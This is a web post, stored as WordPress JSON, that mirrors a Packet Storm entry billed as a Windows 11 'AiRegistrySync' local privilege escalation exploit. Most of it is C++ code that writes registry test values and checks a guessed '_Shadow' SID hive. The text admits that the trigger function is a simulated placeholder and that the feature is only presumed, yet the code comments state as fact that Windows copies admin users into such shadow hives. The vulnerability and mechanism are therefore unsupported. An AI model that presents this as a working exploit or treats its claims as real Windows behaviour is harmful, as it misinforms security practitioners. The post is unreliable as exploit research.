{"id":38348,"date":"2026-01-30T12:54:20","date_gmt":"2026-01-30T12:54:20","guid":{"rendered":"http:\/\/localhost\/?p=38348"},"modified":"2026-01-30T12:54:20","modified_gmt":"2026-01-30T12:54:20","slug":"microsoft-windows-11-build-100278981000-local-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=38348","title":{"rendered":"\ud83d\udcc4 Microsoft Windows 11 build 10.0.27898.1000 Local Privilege Escalation_PACKETSTORM:214612"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-30T17:50:00&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit designed to test a potential local privilege escalation vulnerability in Windows, specifically targeting a feature called AiRegistrySync. It checks if modifications made by a standard user in their own Registry profile can be&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-30T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-01-30T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 11 build 10.0.27898.1000 Local Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214612&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Microsoft Windows 11 build 10.0.27898.1000 AiRegistrySync Shadow Hive Propagation Test Local Privilege Escalation           |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : System built\u2011in component. No standalone download available.                                                                |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/212253\/\\n    \\n    [+] Summary : This C++ code is a Proof of Concept (PoC) designed to test a potential Local Privilege Escalation (LPE) vulnerability in Windows, \\n                  specifically targeting a presumed feature called AiRegistrySync.\\n                  To check if modifications made by a standard user in their own Registry profile can be automatically synchronized (propagated) \\n    \\t\\t\\t  into the protected \\&#8221;Shadow Hive\\&#8221; registry key associated with high-privilege user accounts (like administrators).\\n    \\n    [+] Method:\\n    \\n            It retrieves the Security Identifier (SID) of the current user.\\n    \\n            It constructs a path for the presumed Shadow SID (e.g., adding _Shadow to the standard SID).\\n    \\n            It creates a test key and values (PoC_DWORD, PoC_STRING) within the current user&#8217;s accessible Registry path (HKEY_USERS\\\\[User_SID]\\\\Keyboard Layout\\\\TestVuln).\\n    \\n            It simulates the triggering of the AiRegistrySync process.\\n    \\n            It waits for 15 seconds.\\n    \\n            It attempts to read the created test values from the highly protected Shadow Hive path.\\n    \\n            Success indicates that the synchronization mechanism might be flawed, allowing a lower-privileged user to inject data into a privileged hive, a critical step towards achieving LPE.\\n    \\n    [+] Note \\n    \\n    The test itself is based on genuine security research concepts, but the function to actually start the AiRegistrySync service (TriggerAiRegistrySyncManual) is currently a placeholder\/simulation within this specific code.\\n    \\n    \\n    [+] POC : \\n    \\n    \\n    #include \\u003cwindows.h\\u003e\\n    #include \\u003cstdio.h\\u003e\\n    #include \\u003cstring\\u003e\\n    #include \\u003cvector\\u003e\\n    #include \\u003csddl.h\\u003e\\n    \\n    #pragma comment(lib, \\&#8221;advapi32.lib\\&#8221;)\\n    \\n    \/\/ ===============================================================\\n    \/\/ RAII CLASS \u2013 Safe Registry Handle\\n    \/\/ ===============================================================\\n    class ScopedRegKey {\\n    private:\\n        HKEY hKey = nullptr;\\n    public:\\n        ScopedRegKey() {}\\n        ~ScopedRegKey() {\\n            if (hKey) RegCloseKey(hKey);\\n        }\\n        HKEY* ptr() { return \\u0026hKey; }\\n        HKEY get() const { return hKey; }\\n        operator bool() const { return hKey != nullptr; }\\n    };\\n    \\n    \/\/ ===============================================================\\n    \/\/ Helper: Convert SID string to readable form\\n    \/\/ ===============================================================\\n    bool GetCurrentUserSid(std::wstring\\u0026 sidString) {\\n        HANDLE token;\\n        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, \\u0026token))\\n            return false;\\n    \\n        DWORD size = 0;\\n        GetTokenInformation(token, TokenUser, NULL, 0, \\u0026size);\\n        std::vector\\u003cBYTE\\u003e buffer(size);\\n    \\n        if (!GetTokenInformation(token, TokenUser, \\u0026buffer[0], size, \\u0026size)) {\\n            CloseHandle(token);\\n            return false;\\n        }\\n    \\n        CloseHandle(token);\\n    \\n        PTOKEN_USER user = (PTOKEN_USER)\\u0026buffer[0];\\n        LPWSTR stringSid = nullptr;\\n    \\n        if (!ConvertSidToStringSidW(user-\\u003eUser.Sid, \\u0026stringSid))\\n            return false;\\n    \\n        sidString = stringSid;\\n        LocalFree(stringSid);\\n        return true;\\n    }\\n    \\n    \/\/ ===============================================================\\n    \/\/ Wait for AI Registry Sync with logs every 5 seconds\\n    \/\/ ===============================================================\\n    void WaitForSync(DWORD milliseconds) {\\n        printf(\\&#8221;[*] Waiting %lu ms for AiRegistrySync&#8230;\\\\n\\&#8221;, milliseconds);\\n    \\n        DWORD interval = 1000;\\n        DWORD elapsed = 0;\\n    \\n        while (elapsed \\u003c milliseconds) {\\n            DWORD waitTime = min(interval, milliseconds &#8211; elapsed);\\n            Sleep(waitTime);\\n            elapsed += waitTime;\\n    \\n            if (elapsed % 5000 == 0) {\\n                printf(\\&#8221;[*] Still waiting&#8230; (%lu ms elapsed)\\\\n\\&#8221;, elapsed);\\n            }\\n        }\\n    }\\n    \\n    \/\/ ===============================================================\\n    \/\/ Create test key + write values\\n    \/\/ ===============================================================\\n    bool CreateKeyboardLayoutKey(const std::wstring\\u0026 userSid) {\\n        std::wstring keyPath = userSid + L\\&#8221;\\\\\\\\Keyboard Layout\\\\\\\\TestVuln\\&#8221;;\\n    \\n        HKEY hKey = nullptr;\\n        LSTATUS st = RegCreateKeyExW(\\n            HKEY_USERS,\\n            keyPath.c_str(),\\n            0,\\n            nullptr,\\n            0,\\n            KEY_ALL_ACCESS,\\n            nullptr,\\n            \\u0026hKey,\\n            nullptr\\n        );\\n    \\n        if (st != ERROR_SUCCESS) {\\n            printf(\\&#8221;[!] Failed creating user test key (error: %ld)\\\\n\\&#8221;, st);\\n            return false;\\n        }\\n    \\n        DWORD dw = 1337;\\n        RegSetValueExW(hKey, L\\&#8221;PoC_DWORD\\&#8221;, 0, REG_DWORD, (BYTE*)\\u0026dw, sizeof(dw));\\n    \\n        const wchar_t* txt = L\\&#8221;ShadowPropagationTest\\&#8221;;\\n        RegSetValueExW(hKey, L\\&#8221;PoC_STRING\\&#8221;, 0, REG_SZ,\\n                       (BYTE*)txt,\\n                       (DWORD)((wcslen(txt) + 1) * sizeof(wchar_t)));\\n    \\n        RegCloseKey(hKey);\\n        return true;\\n    }\\n    \\n    \/\/ ===============================================================\\n    \/\/ Dummy AiRegistrySync \u2013 simulation (Replace if real trigger exists)\\n    \/\/ ===============================================================\\n    bool TriggerAiRegistrySyncManual() {\\n        printf(\\&#8221;[*] (Simulated) Triggering AiRegistrySync&#8230;\\\\n\\&#8221;);\\n        return true;\\n    }\\n    \\n    \/\/ ===============================================================\\n    \/\/ Detect shadow SID\\n    \/\/ Windows duplicates high-privilege users like admin into shadow hives\\n    \/\/ ===============================================================\\n    bool FindShadowSid(const std::wstring\\u0026 userSid, std::wstring\\u0026 shadowSid) {\\n        \/\/ Typical pattern:\\n        \/\/ User SID:    S-1-5-21-xxx-xxx-xxx-1001\\n        \/\/ Shadow SID:  S-1-5-21-xxx-xxx-xxx-1001_Shadow\\n    \\n        shadowSid = userSid + L\\&#8221;_Shadow\\&#8221;;\\n        return true;\\n    }\\n    \\n    \/\/ ===============================================================\\n    \/\/ Check if shadow hive contains the expected propagation\\n    \/\/ ===============================================================\\n    bool CheckShadowCopy(const std::wstring\\u0026 shadowSid) {\\n        std::wstring shadowPath = shadowSid + L\\&#8221;\\\\\\\\Keyboard Layout\\\\\\\\TestVuln\\&#8221;;\\n    \\n        ScopedRegKey shadowKey;\\n        LSTATUS st = RegOpenKeyExW(\\n            HKEY_USERS,\\n            shadowPath.c_str(),\\n            0,\\n            KEY_READ,\\n            shadowKey.ptr()\\n        );\\n    \\n        if (st != ERROR_SUCCESS) {\\n            printf(\\&#8221;[!] Shadow hive key not found. Propagation FAILED.\\\\n\\&#8221;);\\n            return false;\\n        }\\n    \\n        printf(\\&#8221;[+] Shadow hive key found! Propagation SUCCESS.\\\\n\\&#8221;);\\n    \\n        DWORD dw = 0;\\n        DWORD sz = sizeof(dw);\\n        if (RegQueryValueExW(shadowKey.get(), L\\&#8221;PoC_DWORD\\&#8221;, nullptr, nullptr,\\n                             (BYTE*)\\u0026dw, \\u0026sz) == ERROR_SUCCESS) {\\n            printf(\\&#8221;[+] Shadow DWORD value = %lu\\\\n\\&#8221;, dw);\\n        }\\n    \\n        wchar_t buf[260];\\n        DWORD size = sizeof(buf);\\n        if (RegQueryValueExW(shadowKey.get(), L\\&#8221;PoC_STRING\\&#8221;, nullptr, nullptr,\\n                             (BYTE*)buf, \\u0026size) == ERROR_SUCCESS) {\\n            printf(\\&#8221;[+] Shadow STRING value = %ls\\\\n\\&#8221;, buf);\\n        }\\n    \\n        return true;\\n    }\\n    \\n    \/\/ ===============================================================\\n    \/\/ Cleanup: Remove keys from user + shadow hives\\n    \/\/ ===============================================================\\n    void CleanupKeys(const std::wstring\\u0026 userSid, const std::wstring\\u0026 shadowSid) {\\n        std::wstring p1 = userSid + L\\&#8221;\\\\\\\\Keyboard Layout\\\\\\\\TestVuln\\&#8221;;\\n        std::wstring p2 = shadowSid + L\\&#8221;\\\\\\\\Keyboard Layout\\\\\\\\TestVuln\\&#8221;;\\n    \\n        RegDeleteTreeW(HKEY_USERS, p1.c_str());\\n        RegDeleteTreeW(HKEY_USERS, p2.c_str());\\n    \\n        printf(\\&#8221;[*] Cleanup complete.\\\\n\\&#8221;);\\n    }\\n    \\n    \/\/ ===============================================================\\n    \/\/ Main Test Procedure\\n    \/\/ ===============================================================\\n    bool TestVulnerability() {\\n        printf(\\&#8221;\\\\n============================================\\\\n\\&#8221;);\\n        printf(\\&#8221;  WINDOWS AiRegistrySync SHADOW HIVE TEST\\\\n\\&#8221;);\\n        printf(\\&#8221;  Final Stable Advanced Edition \u2013 Indoushka\\\\n\\&#8221;);\\n        printf(\\&#8221;============================================\\\\n\\\\n\\&#8221;);\\n    \\n        std::wstring userSid, shadowSid;\\n    \\n        if (!GetCurrentUserSid(userSid)) {\\n            printf(\\&#8221;[!] Could not get current user SID.\\\\n\\&#8221;);\\n            return false;\\n        }\\n    \\n        printf(\\&#8221;[*] Current User SID: %ws\\\\n\\&#8221;, userSid.c_str());\\n    \\n        if (!FindShadowSid(userSid, shadowSid)) {\\n            printf(\\&#8221;[!] Failed to detect shadow SID.\\\\n\\&#8221;);\\n            return false;\\n        }\\n    \\n        printf(\\&#8221;[*] Shadow Hive SID: %ws\\\\n\\&#8221;, shadowSid.c_str());\\n    \\n        \/\/ Step 1 \u2013 Create test key\\n        printf(\\&#8221;\\\\n[*] Step 1: Creating test key\\\\n\\&#8221;);\\n        if (!CreateKeyboardLayoutKey(userSid)) {\\n            printf(\\&#8221;[!] Failed creating test key.\\\\n\\&#8221;);\\n            return false;\\n        }\\n    \\n        \/\/ Step 2 \u2013 Trigger Sync\\n        printf(\\&#8221;\\\\n[*] Step 2: Triggering AiRegistrySync\\\\n\\&#8221;);\\n        TriggerAiRegistrySyncManual();\\n    \\n        \/\/ Step 3 \u2013 Wait\\n        printf(\\&#8221;\\\\n[*] Step 3: Waiting for sync&#8230;\\\\n\\&#8221;);\\n        WaitForSync(15000);\\n    \\n        \/\/ Step 4 \u2013 Check Shadow Copy\\n        printf(\\&#8221;\\\\n[*] Step 4: Checking shadow hive\\\\n\\&#8221;);\\n        bool ok = CheckShadowCopy(shadowSid);\\n    \\n        \/\/ Step 5 \u2013 Cleanup\\n        printf(\\&#8221;\\\\n[*] Step 5: Cleanup\\\\n\\&#8221;);\\n        CleanupKeys(userSid, shadowSid);\\n    \\n        return ok;\\n    }\\n    \\n    \/\/ ===============================================================\\n    \/\/ main()\\n    \/\/ ===============================================================\\n    int main() {\\n        TestVulnerability();\\n        return 0;\\n    }\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/214612&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/214612\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-30T17:50:00&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit designed to test a potential local privilege escalation vulnerability in Windows, specifically targeting a feature called AiRegistrySync. It checks if modifications&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-38348","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Microsoft Windows 11 build 10.0.27898.1000 Local Privilege Escalation_PACKETSTORM:214612 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=38348\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Microsoft Windows 11 build 10.0.27898.1000 Local Privilege Escalation_PACKETSTORM:214612 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-30T17:50:00&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit designed to test a potential local privilege escalation vulnerability in Windows, specifically targeting a feature called AiRegistrySync. It checks if modifications...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=38348\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-30T12:54:20+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38348#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38348\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Microsoft Windows 11 build 10.0.27898.1000 Local Privilege Escalation_PACKETSTORM:214612\",\"datePublished\":\"2026-01-30T12:54:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38348\"},\"wordCount\":1354,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38348#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38348\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38348\",\"name\":\"\ud83d\udcc4 Microsoft Windows 11 build 10.0.27898.1000 Local Privilege Escalation_PACKETSTORM:214612 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-30T12:54:20+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38348#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38348\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38348#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Microsoft Windows 11 build 10.0.27898.1000 Local Privilege Escalation_PACKETSTORM:214612\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Microsoft Windows 11 build 10.0.27898.1000 Local Privilege Escalation_PACKETSTORM:214612 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=38348","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Microsoft Windows 11 build 10.0.27898.1000 Local Privilege Escalation_PACKETSTORM:214612 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-30T17:50:00&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit designed to test a potential local privilege escalation vulnerability in Windows, specifically targeting a feature called AiRegistrySync. It checks if modifications...","og_url":"https:\/\/zero.redgem.net\/?p=38348","og_site_name":"zero redgem","article_published_time":"2026-01-30T12:54:20+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=38348#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=38348"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Microsoft Windows 11 build 10.0.27898.1000 Local Privilege Escalation_PACKETSTORM:214612","datePublished":"2026-01-30T12:54:20+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=38348"},"wordCount":1354,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=38348#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=38348","url":"https:\/\/zero.redgem.net\/?p=38348","name":"\ud83d\udcc4 Microsoft Windows 11 build 10.0.27898.1000 Local Privilege Escalation_PACKETSTORM:214612 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-30T12:54:20+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=38348#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=38348"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=38348#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Microsoft Windows 11 build 10.0.27898.1000 Local Privilege Escalation_PACKETSTORM:214612"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38348","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38348"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38348\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38348"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38348"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38348"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}